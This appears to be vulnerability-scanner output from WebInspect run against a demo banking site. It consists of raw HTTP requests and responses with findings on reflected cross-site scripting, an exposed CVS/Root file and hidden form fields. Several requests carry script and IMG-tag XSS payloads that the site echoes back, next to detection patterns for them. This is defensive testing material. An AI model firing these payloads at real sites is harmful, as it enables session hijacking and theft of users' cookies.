Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=">"><script>alert("XSS")</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=<attack>>"><script>alert("XSS")</script></attack>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\("XSS"\)<\/script>GET /CVS/Root HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:23 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 07 Jan 2002 20:34:30 GMT
ETag: "727e99b5ba97c11:8f6"
Content-Length: 35
:pserver:jeff@localhost:/home/src
CVS RootA common mistake by administrators or developers is to leave the CVS directory as a subdirectory on many of the folders in the web server. Information contained within that directory, such as usernames,filenames,path root and ip addresses, could be recovered by an attacker and utilized for malicious purposes.GET /<attack>CVS/Root</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |40[1]GET /login/login.asp?Action=Login&UserName=>"'><img%20src="javascript:alert('XSS')">&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 362
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: >"'><img src="javascript:alert('XSS')"></h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?Action=Login&UserName=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&Password=333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/><var name="path"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">GET /banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod%5Fsel.forte&source=Freebank&AD_REFERRING_URL=http%3A%2F%2Fwww.Freebank.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:16 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4915
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
User supplied data without POSTThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires any query string be reported as bad behavior. This also should require that the user send everything through a POST request. Webinspect has detected that the URL<B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?serviceName=FreebankCaastAccess&templateName=prod%5Fsel.forte&source=Freebank&AD_REFERRING_URL=http%3A%2F%2Fwww.Freebank.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod%5Fsel.forte&source=Freebank&AD_REFERRING_URL=http%3A%2F%2Fwww.Freebank.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:16 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4915
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Hidden Form ValueThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires that hidden form fields are checked. Webinspect has detected that the URL <B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?serviceName=FreebankCaastAccess&templateName=prod%5Fsel.forte&source=Freebank&AD_REFERRING_URL=http%3A%2F%2Fwww.Freebank.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod%5Fsel.forte&source=Freebank&AD_REFERRING_URL=http%3A%2F%2Fwww.Freebank.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:16 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4915
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Possible Login FormA possible login form was found.GET <var name="path"/>?serviceName=FreebankCaastAccess&templateName=prod%5Fsel.forte&source=Freebank&AD_REFERRING_URL=http%3A%2F%2Fwww.Freebank.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
type=['"]?password['"]?GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=>"'><img%20src="javascript:alert('XSS')">&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:39 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
